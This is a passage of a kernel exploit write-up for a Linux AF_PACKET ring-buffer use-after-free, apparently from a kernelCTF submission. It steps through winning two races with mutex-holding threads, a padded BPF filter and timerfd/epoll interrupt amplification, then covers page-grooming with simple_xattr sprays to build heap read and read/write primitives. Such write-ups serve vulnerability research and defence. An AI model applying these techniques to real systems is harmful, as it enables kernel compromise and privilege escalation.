*)pkc->nxt_offset; +} +``` + +- `pkc->kactive_blk_num == 1` => `pbd` is the second buffer in the reclamation ring buffer. + +```c +static void prb_open_block(struct tpacket_kbdq_core *pkc, + struct tpacket_block_desc *pbd) +{ + // ... + + pkc->pkblk_start = (char *)pbd; + pkc->nxt_offset = pkc->pkblk_start + BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + // ... +} +``` + +- We analyzed `prb_open_block()` above: `pkc->nxt_offset` is the location where the headers and packet data start being written. Now, `pkc->nxt_offset` points into a buffer of the reclamation ring buffer. 
+- The idea is: by reclaiming the freed ring buffer with a ring buffer whose buffers are smaller, we can build a page overflow primitive. +- As described above, `tpacket_rcv()` writes both data we control and data we do not control. +- Because we control `pkc->blk_sizeof_priv`, we can make `pkc->nxt_offset` land near the end of the smaller reclamation buffer, such that the remaining space is just enough to hold the non-controlled data. +- Looking at [2] in `tpacket_rcv()` above, we can see that the controlled data is written at an offset determined by `po->tp_hdrlen`, `maclen` and `po->tp_reserve`. + - `po->tp_hdrlen == 68` for a TPACKET_V3 packet socket. + - `maclen == 14 (ETH_HLEN = 14)`. + - `po->tp_reserve` : set with `setsockopt(PACKET_RESERVE)`. + - => the write offset is controllable. +- Besides the offset, the `snaplen` value decides how many bytes are overwritten. `snaplen` represents the length of the packet data. If we want to overwrite just 8 bytes, for example, we cannot send a raw packet with only 8 bytes of data, but we can send a bigger packet and use the socket filter to truncate the packet length to 8 (check [5] in `tpacket_rcv()`). + +# Winning first race condition +Take a look at `packet_set_ring()` again. +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + // ... + spin_lock(&po->bind_lock); + was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING); + num = po->num; + if (was_running) { + WRITE_ONCE(po->num, 0); + __unregister_prot_hook(sk, false); + } + spin_unlock(&po->bind_lock); + + synchronize_net(); + + err = -EBUSY; + mutex_lock(&po->pg_vec_lock); + // ... +} +``` + +- After releasing the `po->bind_lock` spinlock, `packet_set_ring()` goes on to acquire the `po->pg_vec_lock` mutex. Therefore, if we manage to acquire the mutex beforehand, we can force `packet_set_ring()` to sleep. 
+- Kernel function `tpacket_snd()` has a code path that we can leverage to control the `po->pg_vec_lock` mutex. + +```c +static int tpacket_snd(struct packet_sock *po, struct msghdr *msg) +{ + struct sk_buff *skb = NULL; + struct net_device *dev; + struct virtio_net_hdr *vnet_hdr = NULL; + struct sockcm_cookie sockc; + __be16 proto; + int err, reserve = 0; + void *ph; + DECLARE_SOCKADDR(struct sockaddr_ll *, saddr, msg->msg_name); + bool need_wait = !(msg->msg_flags & MSG_DONTWAIT); // [1] + int vnet_hdr_sz = READ_ONCE(po->vnet_hdr_sz); + unsigned char *addr = NULL; + int tp_len, size_max; + void *data; + int len_sum = 0; + int status = TP_STATUS_AVAILABLE; + int hlen, tlen, copylen = 0; + long timeo = 0; + + mutex_lock(&po->pg_vec_lock); // [2] + + if (unlikely(!po->tx_ring.pg_vec)) { + err = -EBUSY; + goto out; + } + if (likely(saddr == NULL)) { + // ... + } else { + err = -EINVAL; + if (msg->msg_namelen < sizeof(struct sockaddr_ll)) + goto out; + if (msg->msg_namelen < (saddr->sll_halen + + offsetof(struct sockaddr_ll, + sll_addr))) + goto out; + proto = saddr->sll_protocol; + dev = dev_get_by_index(sock_net(&po->sk), saddr->sll_ifindex); + if (po->sk.sk_socket->type == SOCK_DGRAM) { + if (dev && msg->msg_namelen < dev->addr_len + + offsetof(struct sockaddr_ll, sll_addr)) + goto out_put; + addr = saddr->sll_addr; + } + } + + err = -ENXIO; + if (unlikely(dev == NULL)) + goto out; + err = -ENETDOWN; + if (unlikely(!(dev->flags & IFF_UP))) // [3] + goto out_put; + + // ... + + reinit_completion(&po->skb_completion); + + do { + ph = packet_current_frame(po, &po->tx_ring, + TP_STATUS_SEND_REQUEST); + if (unlikely(ph == NULL)) { + if (need_wait && skb) { // [4] + timeo = sock_sndtimeo(&po->sk, msg->msg_flags & MSG_DONTWAIT); + timeo = wait_for_completion_interruptible_timeout(&po->skb_completion, timeo); // [5] + if (timeo <= 0) { + err = !timeo ? 
-ETIMEDOUT : -ERESTARTSYS; + goto out_put; + } + } + continue; + } + + skb = NULL; + tp_len = tpacket_parse_header(po, ph, size_max, &data); // [6] + if (tp_len < 0) + goto tpacket_error; + + status = TP_STATUS_SEND_REQUEST; + hlen = LL_RESERVED_SPACE(dev); + tlen = dev->needed_tailroom; + + // ... + + copylen = max_t(int, copylen, dev->hard_header_len); + skb = sock_alloc_send_skb(&po->sk, // [7] + hlen + tlen + sizeof(struct sockaddr_ll) + + (copylen - dev->hard_header_len), + !need_wait, &err); + + // ... + tp_len = tpacket_fill_skb(po, skb, ph, dev, data, tp_len, proto, // [8] + addr, hlen, copylen, &sockc); + if (likely(tp_len >= 0) && + tp_len > dev->mtu + reserve && + !vnet_hdr_sz && + !packet_extra_vlan_len_allowed(dev, skb)) + tp_len = -EMSGSIZE; + + if (unlikely(tp_len < 0)) { // [9] +tpacket_error: + if (packet_sock_flag(po, PACKET_SOCK_TP_LOSS)) { // [10] + __packet_set_status(po, ph, + TP_STATUS_AVAILABLE); + packet_increment_head(&po->tx_ring); + kfree_skb(skb); + continue; // [11] + } else { + status = TP_STATUS_WRONG_FORMAT; + err = tp_len; + goto out_status; + } + } + + // ... + } while (likely((ph != NULL) || + (need_wait && packet_read_pending(&po->tx_ring)))); + + // ... +out: + mutex_unlock(&po->pg_vec_lock); // [12] + return err; +} +``` + +```c +/** + * wait_for_completion_interruptible_timeout: - waits for completion (w/(to,intr)) + * @x: holds the state of this particular completion + * @timeout: timeout value in jiffies + * + * This waits for either a completion of a specific task to be signaled or for a + * specified timeout to expire. It is interruptible. The timeout is in jiffies. + * + * Return: -ERESTARTSYS if interrupted, 0 if timed out, positive (at least 1, + * or number of jiffies left till timeout) if completed. + */ +long wait_for_completion_interruptible_timeout(struct completion *x, unsigned long timeout); +``` + +- [1] => we control `need_wait`. 
+- At [2], the thread acquires the `po->pg_vec_lock` mutex.
+- At [3], the network interface we select must be in the `UP` state.
+- At [4], we need `skb != NULL`.
+- At [5], reaching this code path puts the thread to sleep while it holds the mutex. We control how long the thread sleeps.
+- At [6], `tp_len` is read from our Tx ring buffer.
+- After [7], `skb != NULL`. There is a code path inside `sock_alloc_send_skb()` that checks `sk->sk_err` and leads to `skb == NULL` if `sk->sk_err != 0`. I mention this because the packet socket used here is already bound to the network interface for the later bug-triggering process. `sk->sk_err == ENETDOWN` if the network interface is currently down (see `packet_notifier()` above). Therefore, although triggering the bug requires the network interface to be in the `DOWN` state, we still need to keep it in the `UP` state at this point to make progress in `tpacket_snd()`.
+- At [8], we can force `tp_len < 0` to reach [9] and [10].
+- At [10], we can configure the packet socket with the `PACKET_SOCK_TP_LOSS` flag.
+- At [11], the loop runs a second time and we reach [5]. Now we have achieved what we want.
+- At [12], the `po->pg_vec_lock` mutex is released.
+
+Because this kernel code path eventually puts the thread to sleep, the exploit creates a thread named `pg_vec_lock_thread` to handle this process. `pg_vec_lock_thread` is pinned to `CPU 0`, runs with the lowest possible priority, and is implemented in a boss-worker model: the main thread sends work to this thread whenever we want to hold the `po->pg_vec_lock` mutex. By reading `/proc/[tid]/stat` (`tid = gettid()`), we can check whether the thread is in the sleep state to confirm that the mutex was acquired as expected. Once `pg_vec_lock_thread` is sleeping, we call `syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time)` to get the approximate time at which the mutex was acquired.
Because we also control how long the thread sleeps, we can calculate the approximate time at which the mutex will be released.
+
+Now we need another thread, named `pg_vec_buffer_thread`. This thread triggers the `packet_set_ring()` free path on the victim packet socket and then triggers `packet_set_ring()` on another packet socket to reclaim the freed ring buffer. It is pinned to `CPU 0` (the same CPU as `pg_vec_lock_thread`).
+
+At this point, the process to trigger the first race condition looks like this:
+1. Acquire the `po->pg_vec_lock` mutex with `pg_vec_lock_thread`.
+2. Put the network interface into the `DOWN` state.
+3. Trigger the `packet_set_ring()` free path (described in the `UAF` section above).
+4. Verify that `pg_vec_buffer_thread` is in the sleep state after trying to acquire the mutex, which confirms that execution has already passed the buggy logic.
+5. Put the network interface into the `UP` state.
+6. At this point, the first race condition is considered won. We can begin to work on the second race condition.
+
+#### Step4 note: Because `pg_vec_buffer_thread` has higher priority than `pg_vec_lock_thread`, we hope that once the `pg_vec_lock` mutex is released and `packet_set_ring()` is allowed to continue, the scheduler will decide to switch to `packet_set_ring()`.
+
+# Winning second race condition
+We use the packet socket created with `int trigger_sendmsg_packet_socket = socket(AF_PACKET, SOCK_PACKET, 0)` to send a packet to the network interface. Calling `sendmsg(trigger_sendmsg_packet_socket, ...)` triggers the kernel function `packet_sendmsg_spkt()`.
+
+```c
+static int packet_sendmsg_spkt(struct socket *sock, struct msghdr *msg,
+                   size_t len)
+{
+    struct sock *sk = sock->sk;
+    DECLARE_SOCKADDR(struct sockaddr_pkt *, saddr, msg->msg_name);
+    struct sk_buff *skb = NULL;
+    struct net_device *dev;
+    struct sockcm_cookie sockc;
+    __be16 proto = 0;
+    int err;
+    int extra_len = 0;
+
+
+    if (saddr) {
+        if (msg->msg_namelen < sizeof(struct sockaddr))
+            return -EINVAL;
+        if (msg->msg_namelen == sizeof(struct sockaddr_pkt))
+            proto = saddr->spkt_protocol;
+    } else
+        return -ENOTCONN;
+
+    saddr->spkt_device[sizeof(saddr->spkt_device) - 1] = 0;
+retry:
+    rcu_read_lock();
+    dev = dev_get_by_name_rcu(sock_net(sk), saddr->spkt_device); // [1]
+    err = -ENODEV;
+    if (dev == NULL)
+        goto out_unlock;
+
+    err = -ENETDOWN;
+    if (!(dev->flags & IFF_UP)) // [2]
+        goto out_unlock;
+
+    // ...
+
+    if (!skb) {
+        size_t reserved = LL_RESERVED_SPACE(dev);
+        int tlen = dev->needed_tailroom;
+        unsigned int hhlen = dev->header_ops ? dev->hard_header_len : 0;
+
+        rcu_read_unlock();
+        skb = sock_wmalloc(sk, len + reserved + tlen, 0, GFP_KERNEL); // [3]
+        if (skb == NULL)
+            return -ENOBUFS;
+
+        skb_reserve(skb, reserved);
+        skb_reset_network_header(skb);
+
+        if (hhlen) {
+            skb->data -= hhlen;
+            skb->tail -= hhlen;
+            if (len < hhlen)
+                skb_reset_network_header(skb);
+        }
+        err = memcpy_from_msg(skb_put(skb, len), msg, len);
+        if (err)
+            goto out_free;
+        goto retry;
+    }
+
+    // ...
+
+    dev_queue_xmit(skb); // [4]
+    // ...
+}
+```
+- [1]: we can choose which network interface to send the packet to.
+- [2]: the network interface must be in the `UP` state.
+- [3]: the packet is created.
+- [4]: the packet is sent to the network interface.
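The user-space side of [1] to [4] can be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the exploit's actual code: the helper names `spkt_addr_init()` and `spkt_send()` are hypothetical, `ETH_P_ALL` is an assumed protocol value, and the socket is assumed to have been created with `socket(AF_PACKET, SOCK_PACKET, 0)`, which needs `CAP_NET_RAW`.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

/* Hypothetical helper: fill a sockaddr_pkt that names the target interface. */
static void spkt_addr_init(struct sockaddr_pkt *addr, const char *ifname,
                           unsigned short proto)
{
    memset(addr, 0, sizeof(*addr));
    addr->spkt_family = AF_PACKET;
    /* spkt_device is a small fixed array; keep the last byte NUL,
     * mirroring what packet_sendmsg_spkt() enforces on its side. */
    strncpy((char *)addr->spkt_device, ifname, sizeof(addr->spkt_device) - 1);
    addr->spkt_protocol = htons(proto);
}

/* Hypothetical helper: send one small payload through a SOCK_PACKET socket.
 * Returns whatever sendmsg() returns (-1 with errno set on failure). */
static ssize_t spkt_send(int fd, const char *ifname,
                         const void *payload, size_t len)
{
    struct sockaddr_pkt addr;
    struct iovec iov = { .iov_base = (void *)payload, .iov_len = len };
    struct msghdr msg;

    spkt_addr_init(&addr, ifname, ETH_P_ALL);

    memset(&msg, 0, sizeof(msg));
    msg.msg_name = &addr;
    /* msg_namelen == sizeof(struct sockaddr_pkt) makes the kernel
     * read the protocol from spkt_protocol. */
    msg.msg_namelen = sizeof(addr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    return sendmsg(fd, &msg, 0);
}
```

A caller would invoke something like `spkt_send(trigger_sendmsg_packet_socket, ifname, data, data_len)` with a short payload, since a small `len` keeps the copy in `memcpy_from_msg()` brief.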
+
+The call chain from `dev_queue_xmit()` to the hook function has two possibilities:
+
+First possibility: `packet_set_ring()` has not yet changed the hook function from `tpacket_rcv()` to `packet_rcv()`
+```c
+dev_queue_xmit
+    __dev_queue_xmit
+        dev_hard_start_xmit
+            xmit_one
+                dev_queue_xmit_nit
+                    tpacket_rcv
+```
+
+Second possibility: `packet_set_ring()` has already changed the hook function from `tpacket_rcv()` to `packet_rcv()`
+```c
+dev_queue_xmit
+    __dev_queue_xmit
+        dev_hard_start_xmit
+            xmit_one
+                dev_queue_xmit_nit
+                    packet_rcv
+```
+
+- Although there are other ways to send a packet to a network interface, I decided to go with `packet_sendmsg_spkt()` because it has a much shorter code path to the hook function, which is better for the race.
+- The data to write should not be large, to avoid spending too much time copying data into the packet.
+- The exploit creates a thread named `tpacket_rcv_thread` to perform the `tpacket_rcv()` triggering process. This thread is pinned to `CPU 1`, which is a different CPU from the one used by `pg_vec_buffer_thread`.
+
+Assuming we successfully trigger `tpacket_rcv()`, we want to slow `tpacket_rcv()` down as much as possible to give `packet_set_ring()` time to free the ring buffer before `tpacket_rcv()` reaches the point where the `UAF` happens.
+
+Take a look at `tpacket_rcv()` again:
+
+```c
+static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+               struct packet_type *pt, struct net_device *orig_dev)
+{
+    struct sock *sk;
+    struct packet_sock *po;
+    struct sockaddr_ll *sll;
+    unsigned int snaplen, res;
+
+    sk = pt->af_packet_priv;
+    po = pkt_sk(sk);
+
+    // ...
+    snaplen = skb->len; // [1]
+
+    res = run_filter(skb, sk, snaplen); // [2]
+    // ...
+
+    if (snaplen > res)
+        snaplen = res; // [3]
+
+    // ...
+```
+```c
+static unsigned int run_filter(struct sk_buff *skb,
+                   const struct sock *sk,
+                   unsigned int res)
+{
+    struct sk_filter *filter;
+
+    rcu_read_lock();
+    filter = rcu_dereference(sk->sk_filter);
+    if (filter != NULL)
+        res = bpf_prog_run_clear_cb(filter->prog, skb);
+    rcu_read_unlock();
+
+    return res;
+}
+```
+
+- [1] : the packet length.
+- [2] : run the filter on the packet and return the packet length. The new length can be smaller than the original packet length.
+- [3] : save the new packet length.
+
+The exploit creates the filter with code that looks like this:
+```c
+#define MAX_FILTER_LEN 700
+struct sock_filter filter[MAX_FILTER_LEN] = {};
+for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+    filter[i].code = BPF_LD | BPF_IMM;
+    filter[i].k = 0xcafebabe;
+}
+
+filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
+filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);
+struct sock_fprog fprog = { .filter = filter, .len = MAX_FILTER_LEN };
+setsockopt(victim_packet_socket, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog));
+```
+
+- By filling the filter with `BPF_LD | BPF_IMM` instructions, we waste time loading `0xcafebabe` into the register 699 times. This helps us a little with the second race.
+- The `BPF_RET | BPF_K` instruction returns the value specified in `k`. This is the truncated size of the packet. Because we cannot send a packet in any form we want, we leverage this filter to truncate the packet length to the overflow size we want. In the example shown above, `k == sizeof(size_t)` means we want to overwrite a field whose size is `sizeof(size_t)`.
+
+
+Because using the filter alone is not enough to win the second race, the exploit employs the timer interrupt technique from Jann Horn.
The implementation of the technique look like the following code: +```c +#define N 100000 +int timerfd = timerfd_create(CLOCK_MONOTONIC, 0); +int epollfd = epoll_create1(0); +struct epoll_event epoll_events[N]; +epoll_events[0].data.fd = timerfd; +epoll_events[0].events = EPOLLIN; +epoll_ctl(epollfd, EPOLL_CTL_ADD, timerfd, &epoll_events[0]); + +for (int i = 0; i < N; i++) { + int dup_timerfd = dup(timerfd); + epoll_events[i].data.fd = dup_timerfd; + epoll_events[i].events = EPOLLIN; + epoll_ctl(epollfd, EPOLL_CTL_ADD, dup_timerfd, &epoll_events[i]); +} + +struct itimerspec settime_value = {}; +settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); +timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); +``` + +The idea is we will try to raise the interrupt at the programmed time to interrupt the `tpacket_rcv()`. When the interrupt happened, `timerfd_tmrproc()` is triggered. + +```c +static enum hrtimer_restart timerfd_tmrproc(struct hrtimer *htmr) +{ + struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, + t.tmr); + timerfd_triggered(ctx); + return HRTIMER_NORESTART; +} +``` + +```c +static void timerfd_triggered(struct timerfd_ctx *ctx) +{ + unsigned long flags; + + spin_lock_irqsave(&ctx->wqh.lock, flags); + ctx->expired = 1; + ctx->ticks++; + wake_up_locked_poll(&ctx->wqh, EPOLLIN); + spin_unlock_irqrestore(&ctx->wqh.lock, flags); +} +``` + +`wake_up_locked_poll()` -> `__wake_up_locked_key()` -> `__wake_up_common()` + +```c +static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode, + int nr_exclusive, int wake_flags, void *key, + wait_queue_entry_t *bookmark) +{ + wait_queue_entry_t *curr, *next; + int cnt = 0; + + // ... + + list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) { // [1] + unsigned flags = curr->flags; + int ret; + + if (flags & WQ_FLAG_BOOKMARK) + continue; + + ret = curr->func(curr, mode, wake_flags, key); + + // ... 
+    }
+
+    return nr_exclusive;
+}
+```
+
+- [1] : each `epoll_ctl()` call in the example code above adds one more entry to the list. By leveraging epoll, we can lengthen the list and make the interrupt handler take more time to finish.
+- The entry is added to the list by the function `ep_ptable_queue_proc()`.
+
+```c
+static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,
+                 poll_table *pt)
+{
+    struct ep_pqueue *epq = container_of(pt, struct ep_pqueue, pt);
+    struct epitem *epi = epq->epi;
+    struct eppoll_entry *pwq;
+
+    if (unlikely(!epi))
+        return;
+
+    pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
+    if (unlikely(!pwq)) {
+        epq->epi = NULL;
+        return;
+    }
+
+    init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);
+    pwq->whead = whead;
+    pwq->base = epi;
+    if (epi->event.events & EPOLLEXCLUSIVE)
+        add_wait_queue_exclusive(whead, &pwq->wait);
+    else
+        add_wait_queue(whead, &pwq->wait); // [1]
+    pwq->next = epi->pwqlist;
+    epi->pwqlist = pwq;
+}
+```
+
+- [1] : where the entry is added.
+
+Although the technique is straightforward to use, using it in the KernelCTF environment needs a little tweak. The problem is that each file descriptor table can hold at most 4096 file descriptors, which is not enough to win the race. The exploit works around the problem by first creating a timerfd and then creating 180 threads named `timerfd_waitlist_thread`. Each thread does the following:
+- Call `unshare(CLONE_FILES)` to create a private file descriptor table per thread.
+- `close()` every file descriptor except the timerfd created earlier by the main thread.
+- Create an epollfd.
+- `dup(timerfd)` until the file descriptor table is full.
+- Call `epoll_ctl()` on each timerfd, as in the code example above, to lengthen the timerfd waitqueue list.
+
+At this point, the process to trigger the second race condition looks like this:
+- Set up the filter on the victim packet socket beforehand.
+- Calculate the time at which to raise the interrupt.
Use `pg_vec_lock_release_time` as the starting point.
+- Arm the timer with `timerfd_settime()`. Because we configured `tpacket_rcv_thread` to run on `CPU 1`, `timerfd_settime()` must be called on `CPU 1` to ensure the interrupt runs on `CPU 1` and hits `tpacket_rcv()` as expected.
+- Send work to `tpacket_rcv_thread`. Besides the packet data, we also send the `pg_vec_lock_release_time` value and a `decrease_sleep_time` value. Using `nanosleep(pg_vec_lock_release_time - decrease_sleep_time)`, we want `tpacket_rcv_thread` to sleep until just before `pg_vec_lock_release_time`. If `tpacket_rcv_thread` sends the packet too early, `tpacket_rcv()` is guaranteed to run, but the `packet_set_ring()` thread is still sleeping. If `tpacket_rcv_thread` sends the packet too late, the hook function has already been set to `packet_rcv()`.
+- The main thread releases the CPU and waits for all threads to finish their work.
+
+# pages_order2_read_primitive
+### Prepare victim packet socket attributes:
+1. `Tx ring buffer` :
+```c
+struct tpacket_req3 tx_ring = {};
+tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
+tx_ring.tp_block_nr = 1;
+tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
+tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;
+```
+
+2. `Rx ring buffer`:
+```c
+struct tpacket_req3 rx_ring = {};
+rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
+rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+rx_ring.tp_sizeof_priv = 16248;
+rx_ring.tp_retire_blk_tov = USHRT_MAX;
+```
+3. `packet_reserve == 38`
+
+4. `socket filter`:
+```c
+struct sock_filter filter[MAX_FILTER_LEN] = {};
+for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+    filter[i].code = BPF_LD | BPF_IMM;
+    filter[i].k = 0xcafebabe;
+}
+
+filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
+filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);
+```
+
+5. 
`sndtimeo` : decide how long the `pg_vec_lock_thread` will sleep while holding the `pg_vec_lock` mutex. I chose one second. +6. `packet_version == TPACKET_V3`. + +### Prepare requests to spray `simple_xattr` kernel objects +```c +struct rb_node { + unsigned long __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +} __attribute__((aligned(sizeof(long)))); + +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; +``` +```c +// Example code to prepare requests +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; +}; + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE // value_size + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; +} + +// sizeof(struct simple_xattr) == 40 and value_size == 8192 => `struct simple_xattr` object will be allocated from pages with `PAGES_ORDER2_SIZE`. +``` + +The primitive building process looks like: +1. Pin current execution to `CPU 0` (same CPU as `pg_vec_buffer_thread`). +2. Create 3 packet sockets: `drain_pages_order2_packet_socket`, `drain_pages_order3_packet_socket_1` and `drain_pages_order3_packet_socket_2`. +3. 
Use `drain_pages_order2_packet_socket` to allocate 1024 pages with `PAGES_ORDER2_SIZE`.
+4. Use `drain_pages_order3_packet_socket_1` to allocate 1024 pages with `PAGES_ORDER3_SIZE`.
+5. Use `drain_pages_order3_packet_socket_2` to allocate 512 pages with `PAGES_ORDER3_SIZE`.
+6. Configure the victim packet socket. The Rx ring buffer is allocated at this step. The expectation is that the buffers of the Rx ring buffer will have higher addresses than the buffers allocated with `drain_pages_order3_packet_socket_1`. [(To satisfy the condition mentioned above)](#assume-we-manage-to-page-groom-in-such-a-way-that-end-came-from-lower-address-and-curr-came-from-higher-address-we-can-avoid-code-path-at-1-and-we-enter-prb_retire_current_block)
+7. Free all pages allocated in step 4.
+8. Spray 2048 `struct simple_xattr` objects to reclaim the pages freed in step 7. Although a `struct simple_xattr` allocation should be served from the `PAGES_ORDER2_SIZE` freelist, the page allocator uses the buddy algorithm: when there is no page on the `PAGES_ORDER2_SIZE` freelist, the kernel takes a page from the `PAGES_ORDER3_SIZE` freelist and splits it into two halves. The first half serves the allocation and the other half is placed on the `PAGES_ORDER2_SIZE` freelist.
+9. Free some `struct simple_xattr` objects to leave slots for the reclamation ring buffer. The implementation looks like this:
+
+```c
+for (int i = 512; i < ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) {
+    Removexattr(
+        primitive->simple_xattr_requests[i]->filepath,
+        primitive->simple_xattr_requests[i]->name
+    );
+
+    primitive->simple_xattr_requests[i]->allocated = false;
+}
+```
+9. Trigger the page overflow process. The expected outcome is that the exploit manages to overwrite the `size` member of one of the `struct simple_xattr` objects with 65536. This is the maximum value allowed for a `struct simple_xattr` object.
+10. 
Validate whether the overflow succeeded, with an implementation that looks like this:
+
+```c
+bool overflow_success = false;
+
+for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) {
+    char value[KMALLOC_8K_SIZE] = {};
+
+    simple_xattr_request = primitive->simple_xattr_requests[i];
+    if (!simple_xattr_request || !simple_xattr_request->allocated)
+        continue;
+
+    ssize_t getxattr_ret = getxattr(
+        simple_xattr_request->filepath,
+        simple_xattr_request->name,
+        value,
+        KMALLOC_8K_SIZE
+    );
+
+    if (getxattr_ret < 0 && errno == ERANGE) {
+        primitive->overflowed_simple_xattr_request = simple_xattr_request;
+        primitive->simple_xattr_requests[i] = NULL;
+        overflow_success = true;
+    }
+
+}
+```
+
+- Originally, each `struct simple_xattr` object has `size == KMALLOC_8K_SIZE`. The overflowed one has `size == 65536`. Calling `getxattr(KMALLOC_8K_SIZE)` on the overflowed one fails with `errno == ERANGE`. The exploit uses this behavior to detect the overflowed object. We will refer to this object as `overflowed_simple_xattr`.
+- From now on, every time we call `getxattr(primitive->overflowed_simple_xattr_request->filepath, primitive->overflowed_simple_xattr_request->name, value, 65536)`, we get a heap leak.
+
+11. Leak the heap and look for at least one recognizable `struct simple_xattr` object. Let's call this object `leaked_content_simple_xattr`. If we don't find any `struct simple_xattr` object, we consider the building of `pages_order2_read_primitive` to have failed and we need to restart the process.
+12. Destroy every allocated `struct simple_xattr` object except the `overflowed_simple_xattr` object and the `leaked_content_simple_xattr` object.
+13. Use `pages_order2_read_primitive` to leak the heap again. At this point the red-black tree contains only two `struct simple_xattr` objects, so the `leaked_content_simple_xattr` object contains the kernel address of the `overflowed_simple_xattr` object.
We will refer to this kernel address as `overflowed_simple_xattr_kernel_address`.
+14. Using the offset at which we found `leaked_content_simple_xattr`, together with `overflowed_simple_xattr_kernel_address`, we can calculate the kernel address of the `leaked_content_simple_xattr` object. We will refer to this kernel address as `leaked_content_simple_xattr_kernel_address`.
+
+# simple_xattr_read_write_primitive
+### Prepare packet sockets to allocate ring buffer
+
+```c
+#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256
+
+for (int i = 0; i < TOTAL_PAGES_ORDER2_PG_VEC_SPRAY; i++)
+    primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0);
+```
+
+The primitive building process looks like:
+1. Pin current execution to `CPU 0` (same CPU as `pg_vec_buffer_thread`).
+2. Create 3 packet sockets: `drain_pages_order2_packet_socket`, `drain_pages_order3_packet_socket_1` and `drain_pages_order3_packet_socket_2`.
+3. Use `drain_pages_order2_packet_socket` to allocate 256 pages with `PAGES_ORDER2_SIZE`.
+4. Use `drain_pages_order3_packet_socket_1` to allocate 128 pages with `PAGES_ORDER3_SIZE`.
+5. Use `drain_pages_order3_packet_socket_2` to allocate 128 pages with `PAGES_ORDER3_SIZE`.
+6. Configure the victim packet socket with exactly the same config as the one used in the `pages_order2_read_primitive` building process. The expectation is that the buffers of the Rx ring buffer will have higher addresses than the buffers allocated with `drain_pages_order3_packet_socket_1`. [(To satisfy the condition mentioned above)](#assume-we-manage-to-page-groom-in-such-a-way-that-end-came-from-lower-address-and-curr-came-from-higher-address-we-can-avoid-code-path-at-1-and-we-enter-prb_retire_current_block)
+7. Free all pages allocated in step 4.
+8. Use the prepared packet sockets to spray 256 ring buffers. Each ring buffer has the minimum number of buffers needed for its allocation to be served from the `PAGES_ORDER2_SIZE` freelist, and each buffer has `PAGES_ORDER0_SIZE` to avoid using too much memory.
As described for the buddy algorithm above, the expectation is that these ring buffers will eventually reuse the pages freed in step 7.
+9. Free some ring buffers to leave slots for the reclamation ring buffer. The implementation looks like:
+```c
+for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) {
+    free_pages(primitive->spray_pg_vec_packet_sockets[i]);
+    primitive->spray_pg_vec_packet_sockets_state[i] = 0;
+}
+```
+10. Trigger the page overflow process. The expected outcome is that the exploit manages to overwrite one of the ring buffers' buffer addresses with `leaked_content_simple_xattr_kernel_address`.
+11. Validate whether the overflow succeeded by mmapping each ring buffer and looking for memory that looks like a `struct simple_xattr` object. We will refer to the packet socket with the overflowed ring buffer as `overflowed_pg_vec_packet_socket`.
+
+
